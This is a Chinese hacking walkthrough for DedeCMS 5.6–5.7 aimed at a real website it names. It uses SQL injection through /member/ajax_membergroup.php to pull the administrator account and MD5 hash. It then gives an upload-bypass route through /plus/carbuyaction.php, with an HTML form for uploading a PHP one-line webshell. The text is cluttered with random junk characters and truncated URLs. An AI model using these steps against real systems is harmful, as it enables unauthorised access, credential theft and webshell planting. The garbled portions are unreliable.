dedecms5.6-5.7注入与上传漏洞利用

admin

①注入漏洞。
这站 http://www.political-security.com/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，
www.political-security.com/data/mysql_error_trace.inc 爆后台
# \- i# G: r# ~5 g$ \5 e) ?3 V然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面，如图说明存在该漏洞。
: r) R2 T8 c! P7 k. s然后写上语句
查看管理员帐号
http://www.political-security.co ... &membergroup=@`
, x8 i/ Y+ I3 ~4 K- |3 A3 W# z
; u' w1 v9 e7 C5 v: g- G% iadmin

查看管理员密码
　http://www.political-security.co ... &membergroup=@`

8d29b1ef9f8c5a5af429
7 y4 [  @4 O# F" N( ]& S4 K& i. c
( E+ K3 |9 ~. y2 z' y9 k% x5 U查看管理员密码
5 e' [; k/ s" U$ Z! P* X1 P; ?' {
5 X6 i- D& E2 d5 z4 s( V得到的是19位的，去掉前三位和最后一位，得到管理员的16位MD5
/ ]+ w5 K" H( `" A: O. Q/ {0 @
) l2 l( _% |+ d; U1 ~; _8d2
9b1ef9f8c5a5af42
9

cmd5没解出来 只好测试第二个方法
/ b) x2 ]- ?+ {- S( M/ Z8 [+ l( s
$ n, ?! |+ N+ M9 A9 b
$ _# U4 P1 X3 J9 o+ @②上传漏洞：
4 ?% _- [' W5 L, q/ ]3 b: A
只要登陆会员中心，然后访问页面链接
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”

! @2 g" S: b" |. I如图，说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

* K% B: m8 b; O3 P7 l7 m于是将Php一句话木马扩展名改为“rar”等，利用提交页面upload1.htm
4 |/ Q4 _9 G3 X* a
/ n  I. _# g( E<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
/ c; D6 c0 h) K" F' w或者
3 P/ W; W2 G. B; O% a即可上传成功